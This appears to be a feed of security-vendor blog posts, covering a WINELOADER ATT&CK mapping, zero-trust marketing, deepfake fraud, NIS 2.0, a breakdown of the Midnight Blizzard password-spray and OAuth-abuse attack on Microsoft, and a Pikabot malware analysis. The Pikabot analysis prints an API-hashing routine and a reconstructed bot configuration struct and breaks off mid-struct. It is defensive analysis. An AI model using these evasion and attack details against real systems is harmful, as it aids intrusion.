decrypted before they are dynamically resolved and called. T1027.009 Obfuscated Files or Information: Embedded Payloads WINELOADER modules are encrypted with RC4 within vcruntime140.dll and C2 responses. T1218.005 System Binary Proxy Execution: Mshta mshta.exe executes wine.hta, which contains malicious JS downloader code. T1033 System Owner/User Discovery WINELOADER sends the current user and system name in each C2 request. T1071.001 Application Layer Protocol: Web Protocols WINELOADER communicates with its C2 via HTTPS. HTTP GET requests contain a request body that is atypical of such requests. T1001.001 Data Obfuscation: Junk Data WINELOADER prepends a randomized number of junk bytes to the request data before encrypting and sending it to the C2. Appendix Below is the full 256-byte RC4 key embedded inside WINELOADER that is used to encrypt and decrypt the information exchanged between the malware and the C2 server. Tue, 27 Feb 2024 09:32:38 -0800 Sudeep Singh Why Haven’t Firewalls and VPNs Stopped More Organizations from Being Breached? Reducing cyber risk is an increasingly important initiative for organizations today. Due to the fact that a single cyber breach can be financially fatal as well as disastrous for countless stakeholders, improving cybersecurity has become a board-level concern and drawn increased attention from regulatory bodies around the globe. As a result, organizations everywhere have poured massive amounts of time and money into security technologies that are supposed to protect them from cybercriminals’ malicious ends. Specifically, the go-to tools that are deployed in an effort to enhance security are firewalls and VPNs. Despite the above, breaches continue to occur (and increase in number) at an alarming rate every year. News headlines about particularly noteworthy breaches serve as continual reminders that improperly mitigating risk can be catastrophic, and that the standard tools for ensuring security are insufficient. One needs not look far for concrete examples—the security debacles at Maersk and Colonial Pipeline are powerful, salient illustrations of what can go wrong. With more and more organizations falling prey to our risk-riddled reality, an obvious question arises: Why haven’t firewalls and VPNs stopped more organizations from being breached? The weaknesses of perimeter-based architectures Firewalls and VPNs were designed for an era gone by; when users, apps, and data resided on premises; when remote work was the exception; when the cloud had not yet materialized. And in this age of yesteryear, their primary focus was on establishing a safe perimeter around the network in order to keep the bad things out and the good things in. Even for organizations with massive hub-and-spoke networks connecting various locations like branch sites, the standard methods of trying to achieve threat protection and data protection still inevitably involved securing the network as a whole. This architectural approach goes by multiple names, including perimeter-based, castle-and-moat, network-centric, and more. In other words, firewalls, VPNs, and the architecture that they presuppose are intended for an on-premises-only world that no longer exists. The cloud and remote work have changed things forever. With users, apps, and data all leaving the building en masse, the network perimeter has effectively inverted, meaning more activity now takes place outside the perimeter than within it. And when organizations undergoing digital transformation try to cling to the traditional way of doing security, it creates a variety of challenges. These problems include greater complexity, administrative burden, and cost, as well as decreased productivity and—of primary importance for our topic in this blog post—increased risk. How do firewalls and VPNs increase risk? There are four key ways that legacy tools like firewalls and VPNs increase the risk of breaches and their numerous, harmful side effects. Whether they are hardware appliances or virtual appliances makes little difference. They expand the attack surface. Deploying tools like firewalls and VPNs is supposed to protect the ever-growing network as it is extended to more locations, clouds, users, and devices. However, these tools have public IP addresses that can be found on the internet. This is by design so that the intended users can access the network via the web and do their jobs, but it also means that cybercriminals can find these entry points into the network and target them. As more of these tools are deployed, the attack surface is continually expanded, and the problem is worsened. They enable compromise. Organizations need to inspect all traffic and enforce real-time security policies if they are to stop compromise. But about 95% of traffic today is encrypted, and inspecting such traffic requires extensive compute power. Appliances have static capacities to handle a fixed volume of traffic and, consequently, struggle to scale as needed to inspect encrypted traffic as organizations grow. This means threats are able to pass through defenses via encrypted traffic and compromise organizations. They allow lateral threat movement. Firewalls and VPNs are what primarily compose the “moat” in a castle-and-moat security model. They are focused on establishing a network perimeter, as mentioned above. Relying on this strategy, however, means that there is little protection once a threat actor gets into the “castle,” i.e., the network. As a result, following compromise, attackers can move laterally across the network, from app to app, and do extensive damage. They fail to stop data loss. Once cybercriminals have scoured connected resources on the network for sensitive information, they steal it. This typically occurs via encrypted traffic to the internet, which, as explained above, legacy tools struggle to inspect and secure. Similarly, modern data leakage paths, such as sharing functionality inside of SaaS applications like Box, cannot be secured with tools designed for a time when SaaS apps did not exist. Why zero trust can stop organizations from being breached Zero trust is the solution to the above problems. It is a modern architecture that takes an inherently different approach to security in light of the fact that the cloud and remote work have changed things forever, as described earlier. In other words, zero trust leaves the weaknesses of perimeter-based, network-centric, firewall-and-VPN architectures in the past. With an inline, global security cloud serving as an intelligent switchboard to provide zero trust connectivity (along with a plethora of other functionality), organizations can: Minimize the attack surface: Hide applications behind a zero trust cloud, eliminate security tools with public IP addresses, and prevent inbound connections Stop compromise: Leverage a high performance cloud to inspect all traffic at scale, including encrypted traffic, and enforce real-time policies to stop threats Prevent lateral movement: Connect users, devices, and workloads directly to apps they are authorized to access instead of connecting them to the network as a whole Block data loss: Prevent malicious data exfiltration and accidental data loss across all data leakage paths, including encrypted traffic, cloud apps, and endpoints In addition to reducing risk, zero trust architecture solves problems related to complexity, cost, productivity, and more. If you would like to learn more about zero trust, join our upcoming webinar, “Start Here: An Introduction to Zero Trust.” Or, if you would like to dive deeper on the weaknesses of yesterday’s tools, read our new ebook, “4 Reasons Firewalls and VPNs Are Exposing Organizations to Breaches.” Tue, 27 Feb 2024 08:04:02 -0800 Jacob Serpa AI-Powered Sales Leadership: Transforming the Playbook for World-Class Coaching We are in an era of change brought about by AI. There’s a lot of positivity but also uncertainty. For sales leaders, the advent of artificial intelligence (AI) presents an opportunity to rewrite the playbook for optimising our impact across our whole team. There’s an opportunity to capitalise on the processing power of AI to amplify sales leaders’ experience and talent. Currently, I have the privilege of running our sales leadership enablement in EMEA at Zscaler, and advising external GTM leaders. I’ve also been doing some independent research into AI. As such, I have developed a good understanding of the current challenges sales teams face and how AI could assist us in being more effective leaders in the future. Current State: Human-Powered Sales Forecasting In sales, managing the forecast is one of the key challenges for leaders. Managing the forecast today can mean getting intimately involved in as many deals as possible so that you can spot risk, coach the people involved, and drive the right actions and urgency directly. This approach has, in the past, worked effectively at delivering the forecast, but with clear drawbacks: inconsistency, time drain, and inability to scale. Sometimes referred to as the “hero” approach, “saving” deals can be exhausting for leaders and can unintentionally create a micro-management style of culture that can lead to other challenges. In addition, a sales leader can only focus on a few key deals at a time, sometimes sacrificing support for the vast majority. The Data Dilemma Sales leaders are not data analysts. Currently, they are expected to review large amounts of performance data constructively, extract the necessary insights efficiently, and translate these insights into coaching opportunities for their salespeople. Traditionally, we use leading indicators to help us understand what activities will deliver success for our salespeople and sales leaders. These are powerful metrics that shape the weekly and quarterly operating cadence for our teams. These leading indicators are manual inputs. E.g.: Number of new business meetings Number of opportunity progression meetings Proof of values Pipeline coverage, etc. Leading indicators have always been very important because we need a scalable way of measuring how to protect the business now and in the future. However, what every good sales leader knows is that for each person, business unit, region, and market, there are always discrepancies based on the skill of the individual, their tenure, the market, the culture of the region, etc. Therefore, it becomes challenging to cater for these nuances at scale and the manual inputs can feel limited. In an age when we can develop deeper insights, imagine if we could tailor make leading indicators that are fit for each individual, team, or region. The human-powered playbook for sales leaders stops working at scale As the needs of our employees change and the metrics for success remain constant, there is an opportunity to evolve this traditional playbook, looking toward new tools for assistance. Specifically, AI can help us to scale our ability to coach our people, understand potential business risks, and deliver for the business. Future State: AI-Assisted Analysis & Insights to Optimise Sales Coaching The charter for sales leadership has always been about prioritising their people – putting them before the deal and providing the right tools to be successful. Now we have an opportunity to expand our coaching at scale using data to guide us to the right areas of focus. There is a huge opportunity for sales leaders to develop their management style and transition from being dealmakers to being transformative coaches, assisted by AI. You may have heard of the term “Building a Second Brain,” coined by Tiago Forte: “Building a Second Brain is a methodology for saving and systematically reminding us of the ideas, inspirations, insights, and connections we’ve gained through our experience … . A Second Brain ultimately expands our memory and our intellect using modern tools of technology.” AI presents the potential to serve as a second brain, helping bridge the gap between a sea of data to having effective coaching conversations. Ultimately, helping leaders scale. For instance, imagine an AI tech stack that can help us ingest the sea of data across deals, learn the patterns and trends across the entire GTM salesforce, benchmark the performance data against the norm, trend this information and tailor it at scale for specific individuals, then create intuitive, human-like written insights that are easy for sales leaders to understand in the moment so that they can coach their team effectively on where to focus their time and energy. AI could finally be the technology that can help sales leaders develop insights from the pool of performance data in real time so that they can deliver impactful coaching for their people. I’m privileged to be a part of this game changing transformation. It’s an exciting time for all sales leaders if we adapt and evolve the way we think and behave. This topic is top of mind for myself and the other sales leaders at Zscaler and across industries. I welcome you to join the conversation, perhaps by responding to this prompt: How can AI help us rewrite the Sales Leader playbook, and help us become world class coaches? If you’re interested in learning more about the advancements we’re driving and the opportunities for growth within Zscaler’s sales organisation, please DM me directly to begin the conversation. Thu, 22 Feb 2024 07:29:08 -0800 Jason Creane The old social engineering playbook – Now with AI! When you’ve been in the security world long enough, you start to see old playbooks being reused, with new technology. Case in point: ‘Deepfake’ has been an increasingly common phrase in the news, describing digitally manipulated video being used to misrepresent a person or falsify identity. The latest example of deepfake targeting, where a successful video call resulted in a 25 million USD money transfer, captured people’s attention for a number of reasons. The main news value was in the enormous amount of money that the attackers were able to steal by faking a single video call. In itself, the technical playbook used to trick the person was nothing new. However, this deepfake example demonstrated once again just how high a level of sophistication is possible when AI is orchestrated creatively. People generally fear a relatively new technology, like AI, because they can’t immediately grasp its full potential and they have a fear of the unknown. Similarly, technological advancements also scare people when they feel like they pose a threat to their sense of security or working lives, such as losing their jobs to AI. The social engineering techniques used by adversaries have continuously evolved and usually these adversaries are faster to adopt new technologies for their benefit than we, the defenders, are to protect their victims. You can see examples of this in the not too distant past: In times of modem connectivity, a common piece of malware would dial up a modem in the middle of the night and connect it to a toll number, leading to enormous bills. A few years ago, a rash of malicious android apps hacked mobile phones to dial toll numbers as a way to make quick and easy money – which was basically a modern form of the old modem dialer tactic. Cryptominers harvesting the compute powers of infected systems was then the next step in this evolution. The human risk factor History has shown us a number of examples of the old social engineering playbook in use. The technique of faking a senior executive‘s voice by reusing publicly available audio clips to threaten users into taking action is already fairly well known. Faking video sessions showing a range of people in a live and interactive call, however, reaches a new (and scary) level of cybercriminal sophistication and has therefore sown a new level of appropriate and respectful fear around AI’s technological evolution. It is the perfect demonstration of how easily humans can be tricked or coerced into taking action – and of bad actors using this to their advantage. But this attack also highlights how a new piece of technology can enable adversaries to do the same tasks they have been doing before, but more efficiently. And bad guys are taking advantage of this technological advancement fast. Unfortunately, the general public is still not fully aware of how social engineering techniques continue to evolve. They don't follow security news and trust that these kinds of attacks will never happen to them. This is what makes traditional security awareness training difficult to prove effective, the public doesn’t believe they (as individuals) will be targeted. So when it does happen, they are unprepared and are duped into falling prey to the social engineering attack. In the wake of this recent attack questions were also raised about how – if AI is really good enough to make these video scenarios look so realistic – an employee would have any chance of detecting the fake. The fact is that human beings are not machines, and they will always be a risk factor as an organisation‘s first line of defence because they will have a variable level of security awareness (no matter how good the internal training process might be). Imagine if someone has a bad night or returns home late from a business trip or sports event. They simply might not be as laser-focused on detecting modern social engineering techniques or paying attention to the details the following day. The big challenge is that AI won’t have an off day – its targeting will remain consistent. The technology to fight these playbooks already exists – but it is not widely used The fact that these kind of plays keep working shows that businesses have not yet adapted their security and organisational processes to handle them. One way to counteract deep fakes videos starts at the (security) process level. My first idea is a simple one: to ensure that teleconferencing systems include a function to authenticate a logged-on user as a human being. A straightforward plug-in could do the job, employing two-factor authentication to verify an identity within Zoom or Teams, for example. Hopefully such an API would be fairly easy to develop and would be a huge step forward in preventing sniffing attacks via the phone as well. Additionally, the mindset about being afraid of AI has to change. It is an amazing piece of technology, not only when it is misused. Society just needs to understand its boundaries. AI can actually be implemented to stop these sorts of modern attacks if security executives learn how to control the problem and use the technology to get ahead of the bad actors. Deception technologies already exist, and AI can be used to detect anomalies much faster and more effectively, showing its potential for good. From a more all-up security perspective, adapting a Zero Trust mentality for security can enable organisations to continually improve their security posture on the process level. Zero Trust could not only help on a connectivity level, but it could also improve security workflows, which helps to verify whether everyone in a call is authenticated against an internal directory. Zscaler‘s Identity Threat Detection and Response (ITDR) is already mitigating threats that are targeting a user’s identity. With the help of the new service, the risk to identities is becoming quantifiable, misconfigurations are being detected, and real-time monitoring and privileged escalations are helping to prevent breaches. Finally – going back to the initial example of the successful deepfake – it is hard to believe that you can transfer so much money in a modern organization without verification processes operating in the background. Organisations would be well advised to check the overall risk level of such processes within their own infrastructure. It would raise the barriers to an attack greatly, if solid administrative processes were put in place to reduce risk – not only in the security organisation, but for operational processes like payments authentication as well. Not everything needs to be enhanced by a technological solution. Sometimes a new procedure where two people must sign off on a funds transfer could be the step which protects the organization from losing $25m USD. Tue, 20 Feb 2024 05:54:06 -0800 James Tucker NIS 2.0 - New Cybersecurity Rules In the EU Back in 2021, the White House issued an executive order compelling federal government agencies to develop a plan for implementing a zero trust architecture. This was followed by a memorandum that mandated federal agencies to achieve specific zero trust security goals by the end of 2024. Last year, as you may have heard, the SEC in the United States issued new rules compelling publicly traded companies to disclose material cybersecurity breaches. As it’s happened, the SEC has wasted no time in showing its regulations have teeth, with the first prosecutions having already taken place. So, there’s a lot going on in the USA, but it’s not the only place in the world where policymakers are pushing for—or even mandating—the adoption of zero trust principles. This year the European Union will be updating and tightening its Network and Information Systems (NIS) directive, and as anyone who experienced the arrival of the GDPR regulations on privacy will tell you, the reach of EU regulations can be great indeed. NIS 2.0 The NIS 2.0 directive comes into force in October 2024, mandating that management bodies within organizations in specific categories implement cybersecurity risk management measures. Impacted categories extend to: Energy Transport Banking Financial market infrastructure Health Drinking water Wastewater Digital infrastructure ICT service management (B2B) Public administrations Space Postal and courier services Waste management Manufacture, production, and distribution of chemicals Food production, processing, and distribution Manufacturing Digital providers Research As you can see, the directive is focused on critical physical and digital infrastructure within EU member states, but it also has reach. It applies not only to organizations within the EU, but also to any organization worldwide that provides services to any of the protected sectors within the EU. As with the SEC regulations, there are strict rules for prompt incident reporting. The stick The picture is abundantly clear at this point. Government bodies in regions covering hundreds of millions of citizens have recognized that the risk of inadequate cybersecurity practices is severe enough to warrant strict regulations and even severe penalties. The carrot has been in place for many years—now comes the stick! The carrot So, what’s the carrot? What are the positive aspects to strengthening your security defenses? Sure, it starts with reducing cyberattack risk and achieving compliance, but what else? Organizations that implement robust cybersecurity practices stand to gain significantly in terms of cost reduction, competitiveness, business continuity, and customer trust. Not just one carrot, but a whole bunch! Help is at hand. The NIS 2.0 directive itself includes clear guidance on how to improve your cybersecurity stance, and you won’t be surprised to learn that the first recommended cyber hygiene practice listed is the adoption of zero trust principles. In fact, as you review these lengthy regulatory and legal requirements, zero trust comes up routinely as the holy grail to aim for. “Users should log into applications, rather than networks” Help is also available from Zscaler, where we’ve been designing and building the foundational pillars of a zero trust architecture since 2007. If you’d like to speak to someone about implementing zero trust and achieving regulatory compliance, whatever your industry, please get in touch. Alternatively, join one of our monthly introductory webinars to learn more and ask questions. Click here and search ‘start here’ to find the next session to sign up for. Tue, 20 Feb 2024 00:00:02 -0800 Simon Tompson Microsoft, Midnight Blizzard, and the Scourge of Identity Attacks Summary On January 19, 2024, technology leader Microsoft disclosed that it had fallen victim to a Russian state-sponsored cyberattack that gave the threat actors access to senior management mailboxes and resulted in sensitive data leakage. While we will break down the attack step-by-step and explain what organizations can do to defend against similar attacks below, here’s a TL;DR. The threat actor Midnight Blizzard: State-sponsored Russian threat actor also known as Nobelium, CozyBear, and APT 29 Notable Midnight Blizzard breaches: Hewlett Packard Enterprise (December 12, 2023) and SolarWinds (December 14, 2020) The facts Attack target: Microsoft’s Entra ID environment Techniques used: Password spraying, exploiting identity and SaaS misconfigurations Impact: Compromised Entra ID environment, unauthorized access to email accounts of Microsoft’s senior leadership team, security team, legal, and more What’s unique about the attack? Using stealthy identity tactics that bypasses existing defenses to compromise users Exploiting misconfigurations in SaaS applications to gain privileges Exploiting identity misconfigurations in Entra ID to escalate privileges The attack sequence Found a legacy, non-production test tenant in Microsoft’s environment. Used password spraying via residential proxies to attack the test app tenant. Limited the number of attack attempts to stay under the threshold and evade blocking triggered by brute forcing heuristics. Guessed the right password and compromised the test tenant’s account. Generated a new secret key for the Test App that allowed the threat actor to control the app every where it was installed. Test App was also present in the corporate tenant. Threat actor used the app’s permissions to create an admin user in the corporate tenant. Used the new admin account to create malicious OAuth apps. Granted the malicious app the privilege to impersonate the users of the Exchange service. Used the malicious app to access Microsoft employee email accounts. Microsoft’s official guidance Defend against malicious OAuth applications Audit privileged identities and apps in your tenant Identify malicious OAuth apps Implement conditional access app control for unmanaged devices Protect against password spray attacks Eliminate insecure passwords Detect, investigate, and remediate identity-based attacks Enforce multi factor authentication and password protections Investigate any possible password spray activity Zscaler’s guidance Continuously assess SaaS applications for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Continuously assess Active Directory and Entra ID (previously known as Azure AD) for misconfigurations, excessive permissions, and malicious changes that open up attack paths. Monitor users with risky permissions and misconfigurations for malicious activity like DCSync, DCShadow, kerberoasting, etc. that is typically associated with an identity attack. Implement containment and response rules to block app access, isolate the user, or quarantine the endpoint on an identity attack detection. Implement deception to detect password spraying, Entra ID exploitation, Active Directory exploitation, privilege escalation, and lateral movement for instances where stealthy attacks bypass existing detection and monitoring controls. Deconstructing the attack The threat actor Midnight Blizzard has had a long history of pulling off highly publicized breaches. It’s Microsoft this time around, but in the past, they’ve allegedly compromised Hewlett Packard Enterprise and SolarWinds. To people who analyze attacks for a living, the Microsoft breach should not come as a surprise. Midnight Blizzard is among a growing list of nation-state and organized threat actors that rely on identity compromise and exploiting misconfigurations/permissions in SaaS applications and identity stores to execute breaches that conventional security thinking cannot defend against. Other threat groups using these strategies and techniques include Evil Corp, Lapsus$, BlackMatter, and Vice Society. In case of the Microsoft breach, the attackers demonstrated a profound understanding of OAuth mechanics and attack techniques to evade detection controls. They created malicious applications to navigate Microsoft's corporate environment. And by manipulating the OAuth permissions, they granted themselves full access to Office 365 Exchange mailboxes, enabling them to easily exfiltrate sensitive emails. Security challenges Identity-centric tactics: Midnight Blizzard strategically targeted identities, exploiting the user's credentials as a gateway to sensitive data. Conventional detection controls like EDRs are not effective against such attacks. OAuth application abuse: The adversaries adeptly abused OAuth applications, a technique that complicates detection and enables prolonged persistence. Misconfiguration blind spots: Identifying misconfigurations within Active Directory/Entra ID and SaaS environments remains a complex task, often resulting in blind spots for defenders. Step-by-step breakdown Pre-breach Before the attack commenced, an admin within Microsoft's test tenant had created an OAuth app. For the purpose of this blog post, let’s call this app ‘TestApp.’ For reasons unknown, this app was subsequently installed in Microsoft's corporate environment with elevated permissions, likely encompassing the scope Directory.ReadWrite.all, granting it the capability to create users and assign roles. Notably, this app appeared to be dormant and possibly forgotten. ThreatLabz note: There is an unimaginable sprawl of applications, users, and associated misconfiguration and permissions that security teams often have no visibility into. More often than not, blind spots like these are what result in publicized breaches. Initial access In late November 2023, Midnight Blizzard initiated reconnaissance on Microsoft's SaaS environment. Discovering the test tenant, the attacker targeted its admin account, which, being a test account, had a weak, guessable password and lacked multi-factor authentication (MFA). Employing a password spraying attack, the attacker systematically attempted common passwords to gain access, leveraging residential proxies to obfuscate their origin and minimize suspicion. Eventually, the attacker successfully compromised the admin account. ThreatLabz note: Traditional threat detection and monitoring controls are ineffective against attacks that use valid credentials, MFA-prompt bombing, and other identity-centric techniques to compromise users. Persistence With control over the admin account, the attacker obtained the ability to generate a new secret key for TestApp, effectively commandeering it across all installations. This tactic mirrors techniques observed in the SolarWinds attack of 2020. ThreatLabz note: In the absence of continuous monitoring and high-confidence alerting for malicious changes being made to permissions in SaaS applications, attacks like these easily cross the initial access phase of the kill chain. Privilege escalation Given TestApp's permissions within Microsoft's corporate tenant, the attacker created a new user, likely an administrator, to further their access. Subsequently, the attacker deployed additional malicious OAuth apps within the tenant to evade detection and ensure persistence, leveraging TestApp to grant elevated roles, such as Exchange role EWS.full_access_as_app, facilitating mailbox access and bypassing MFA protection. ThreatLabz note: Configuration and permission based blindspots extend to identities themselves. As such, it is imperative that organizations have the ability to continuously assess their Active Directory/Entra ID for misconfigurations, excessively permissive policies, and other permissions that give attackers the ability to escalate privileges from a compromised identity. They should also continuously monitor for malicious changes in the identity store that might potentially be creating additional attack surfaces. Lateral movement Though specifics regarding the number and origin of installed apps remain unclear, the attacker's utilization of TestApp to confer privileges is evident. This culminated in unauthorized access to mailboxes belonging to Microsoft's senior leadership, security personnel, legal team, and other stakeholders. How zero trust can help A zero trust architecture provides a fundamentally secure approach that is better at protecting against stealthy attacks that are used by nation-state threat actors and organized adversaries. Zero trust fundamentally eliminates weaknesses in your environment that are core properties of hub and spoke network models. Below is a 10,000 foot reference architecture for zero trust that explains how and why it better protects against Midnight Blizzard-style attacks. Core zero trust capabilities This is the heart of a zero trust architecture consisting of Internet Access and Private Access. The Zero Trust Exchange acts as a switchboard brokering all connections between users and applications. This architecture makes your applications invisible to the Internet, thereby eliminating the external attack surface, replaces high-risk VPNs, and uses segmentation to reduce lateral threat movement and internal blast radius. To broker the connection, the Zero Trust Exchange verifies the identity, determines the destination, assesses risk, and enforces policy. ThreatLabz note: Zscaler extends core zero trust capabilities with SaaS supply chain security, Identity Posture Management, ITDR, Deception, and Identity Credential Exposure to eliminate application and identity misconfigurations, detect stealthy attacks, and provide visibility into exposed credentials on endpoints to remove lateral movement paths. Below, we breakdown what each of these capabilities can do. SaaS Security While the move to the cloud and SaaS applications has aided organizations to accelerate their digital transformation, it has also created a new set of security challenges. Among these, the lack of visibility into dangerous backdoor connections to SaaS applications is paramount as it creates supply chain risk — the kind that was exploited in the Microsoft breach. SaaS Security strengthens your security posture by providing visibility into third-party application connections, over-privileged access, risky permissions, and continuous monitoring for changes that can be malicious in nature. It is a core step in securing your SaaS environment. Identity Posture Management Nine in ten organizations are exposed to Active Directory attacks and there has been a 583% increase in Kerberoasting and similar identity attack techniques in 2023 alone. These are not isolated phenomena. Misconfigurations and excessive permissions in Active Directory and other identity providers are what enable these types of attacks. For example, an unprivileged account without MFA having the ability to control an application with privileged roles should be flagged, but most security teams do not have appropriate visibility into these types of misconfigurations. Identity Posture Management augments zero trust by providing security teams visibility into identity misconfigurations, policies, and permissions that open up potential attack paths. With periodic assessments, security teams can leverage remediation guidance to revoke permissions, limit policies, and remove misconfigurations. Identity Posture Management also alerts security teams to malicious changes in the Active Directory in real time. Deception and ITDR (Identity Threat Detection and Response) As evidenced in the Microsoft breach, attackers used password spraying from a residential proxy and limited the number of tries to evade detection. Traditional threat detection and monitoring approaches just do not work here. Deception, on the other hand, is a pragmatic approach that can detect these attacks with fairly high confidence. Decoy users created in Entra ID can detect such password spraying attacks without false positives or the need to write complex detection rules. ITDR can detect identity-specific attacks like DCSync, DCShadow, and Kerberoasting that would otherwise require detection engineering and significant triage to spot. Identity Credential Exposure While TTPs (Techniques, Tactics, and Procedures) were not reported for credential exploitation, credentials and other sensitive material (like username, passwords, authentication tokens, connection strings, etc.) on the endpoint in files, registry, and other caches are something that threat actors like Volt Typhoon, Scattered Spider, BlackBasta, BlackCat, and LockBit are known to have exploited in publicly reported breaches. Identity Credential Exposure provides security teams with visibility into credential exposure across their endpoint footprint, highlighting blind spots that open up lateral movement and data access paths from the endpoint. Zero trust creates multiple opportunities to detect and stop Midnight Blizzard-style attacks Problem Solution How does it work? MITRE ATT&CK Technique Password spraying Zscaler Deception Decoy user accounts in Entra ID can detect any attempts to sign in using the credentials of the decoy users. Any failed/successful attempts will be logged to detect attacks like password spraying T1110.003 - Brute Force: Password Spraying T1078.004 - Valid Accounts: Cloud Accounts Existence of apps/SPNs with high privilege Zscaler ITDR ITDR can surface unprivileged accounts that have a path (e.g., owner rights) to apps with privileged roles NA Creation of apps/SPNs with high privilege Zscaler SaaS Security Monitoring for and alerting when a risky app is added, app is created by an unverified publisher, and when an app hasn’t been used in a while There is no technique that maps to this but in terms of the nature of the technique, the ones listed below are a close approximation of how you think of the attack. T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Creation/modification of users with high privileges Zscaler ITDR Monitoring of an alerting on unauthorized addition of privileged permissions to principals T1136.003 - Create Account: Cloud Account T1098.003 - Account Manipulation: Additional Cloud Roles Secret addition to apps Zscaler SaaS Security Flags applications with multiple Application Secrets T1098.001 - Account Manipulation: Additional Cloud Credentials Disabled MFA Zscaler ITDR Find accounts where MFA is disabled and get alerts when MFA is disabled for any account T1556.006 - Modify Authentication Process: Multi-Factor Authentication Consent grants Zscaler SaaS Security Monitors inclusion of high risk scopes like EWS.full_access_as_app or EWS.AccessAsUser.All to alert on the app’s risk level T1098.003 - Account Manipulation: Additional Cloud Roles T1098.002 - Account Manipulation: Additional Email Delegate Permissions What should I do next? Identity is the weakest link. Irrespective of whether you are running a zero trust architecture or not, start by getting visibility into identity misconfigurations and excessive permissions that can allow attackers to grant themselves privileges. We’re offering a complimentary Identity Posture Assessment with Zscaler ITDR. Gain visibility into your SaaS sprawl and find dangerous backdoor connections that can give attackers the ability to establish persistence. Request an assessment with Zscaler SaaS Security. Implement Deception irrespective of what other threat detection measures you have. It is one of the highest ROI threat detection controls that you can implement, augmenting controls like EDR. Zscaler Deception has a comprehensive set of decoys that can deceive and detect sophisticated attackers. If you are a Zscaler customer, contact your account manager for support on these assessments and Deception rollout. Tue, 13 Feb 2024 17:10:20 -0800 Amir Moin The (D)Evolution of Pikabot Introduction Pikabot is a malware loader that originally emerged in early 2023. Over the past year, ThreatLabz has been tracking the development of Pikabot and its modus operandi. There was a significant increase in usage of Pikabot in the second half of 2023, following the FBI-led takedown of Qakbot. This was likely the result of a BlackBasta ransomware affiliate replacing Qakbot with Pikabot for initial access. However, Pikabot ceased activity shortly after Christmas 2023, with its version number being 1.1.19 at that time. In recent campaigns, which started in February 2024, Pikabot reemerged with significant changes in its code base and structure. Although it appears to be in a new development cycle and testing phase, the developers have reduced the complexity of the code by removing advanced obfuscation techniques and changing the network communications. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. In December 2023, Pikabot activity ceased, possibly as a result of a new version of Qakbot that emerged. In February 2024, a new version of Pikabot was released with significant changes. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Pikabot now stores all configuration elements in a single memory block, similar to Qakbot. In prior versions, Pikabot decrypted necessary configuration elements only when required. Pikabot continues to use HTTP for command-and-control, but its network protocol has changed, including the network command IDs and the encryption algorithms. Technical AnalysisAs covered in our previous technical analysis of Pikabot, the malware consists of two components: a loader and a core module. The core module is responsible for executing commands and injecting payloads from a command-and-control server. The malware uses a code injector to decrypt and inject the core module. It employs various anti-analysis techniques and string obfuscation. Pikabot uses similar distribution methods, campaigns, and behaviors as Qakbot. The malware acts as a backdoor, allowing the attacker to control the infected system and distribute other malicious payloads such as Cobalt Strike.In the following sections, we will describe the latest Pikabot variant, including its capabilities and notable changes compared to previous versions. The analysis was performed on Pikabot binaries with version 1.8.32.Anti-analysis techniquesAs with previous versions of Pikabot, this variant employs a series of different anti-analysis techniques to make the analysis more time-consuming. It should be noted that none of the methods below presents any significant advanced capabilities. Furthermore, Pikabot used a series of more advanced detection features in its loader component in previous versions of the malware.Strings encryptionThe most notable change is the string obfuscation. In previous versions of Pikabot, each string was obfuscated by combining the RC4 algorithm with AES-CBC. This method was highly effective in preventing analysis, particularly when it came to automated configuration extraction. To successfully analyze Pikabot, an analyst would need to detect not only the encrypted string but also its unique RC4 key. Additionally, they would need to extract the AES key and initialization vector, which are unique to each Pikabot payload.It should be noted that the approach the Pikabot malware developers followed is similar to the ADVobfuscator.In the latest version of Pikabot, the majority of the strings are either constructed by retrieving each character and pushing it onto the stack (Figure 1) or, in some rare cases, a few strings are still encrypted using the RC4 algorithm only.Figure 1. String stack constructionJunk instructionsThis anti-analysis technique was also implemented in previous versions of Pikabot. Pikabot inserts junk code between valid instructions. The junk code is either inlined in the function or a call is made to a function, which contains the junk code (Figure 2).Figure 2. Junk codeAnti-debug methodsPikabot uses two methods to detect a debugging session. They are:Reading the BeingDebugged flag from the PEB (Process Environment Block).Calling the Microsoft Windows API function CheckRemoteDebuggerPresent.Pikabot constantly performs the debugging checks above in certain parts of its code. For example, when it (en/de)codes network data or when it makes a request to receive a network command.Anti-sandbox evasionIn addition to the anti-debugging checks above, Pikabot uses the following methods to evade security products and sandboxes:Pikabot utilizes native Windows API calls.Pikabot delays code execution at different stages of its code. The timer is randomly generated each time.Pikabot dynamically resolves all required Windows API functions via API hashing.A Python representation of the algorithm is available below.api_name = b"" checksum = 0x113B for c in api_name: if c > 0x60: c -= 0x20 checksum = (c + (0x21 * checksum)) & 0xffffffff print(hex(checksum))Language detectionIdentical to previous versions, Pikabot stops execution if the operating system's language is any of the following:Russian (Russia)Ukrainian (Ukraine)This is likely an indication that the threat actors behind Pikabot are Russian-speaking and may reside in Ukraine and/or Russia. The language check reduces the chance of law enforcement action and potential criminal prosecution in those regions.Bot initialization phaseUnlike previous versions, this version of Pikabot stores all settings and information in a single structure at a global address (similar to Qakbot). The analyzed structure is shown below. For brevity, we redacted non-important items of the structure (such as Windows API names).struct bot_structure { void *host_info; WINHTTPAPI winhttp_session_handle; bool bot_error_init_flag; FARPROC LdrLoadDll; FARPROC LdrGetProcedureAddress; FARPROC RtlAllocateHeap; FARPROC RtlReAllocateHeap; FARPROC RtlFreeHeap; FARPROC RtlDecompressBuffer; FARPROC RtlGetVersion; FARPROC RtlRandomEx; ---redacted— wchar_t* bot_id; bool registered_flag; int process_pid; int process_thread_id; int* unknown_unused_1; unsigned short os_arch; unsigned short dlls_apis_loaded_flag; int unknown_unused_2; unsigned char* host_rc4_key; int number_of_swap_rounds; int beacon_time_ms; int delay_time_ms; // Used only during the initialization phase of Pikabot. int delay_seed_mul; wchar_t* bot_version; wchar_t* campaign_tag; wchar_t* unknown_registry_key_name; cncs_info* active_cnc_info; cncs_info* cncs_list; int num_of_cncs; int unknown_unused_3; int max_cnc_attempts; wchar_t* user_agent; void* uris_array; void* request_headers_array; TEB* thread_environment_block; }; struct cncs_info { wchar_t* cnc; int cnc_port; int http_connection_settings; // If set to 1 then server’s certificate validation is ignored and sets the flags WINHTTP_FLAG_SECURE | WINHTTP_FLAG_BYPASS_PROXY_CACHE int connection_attempts; bool 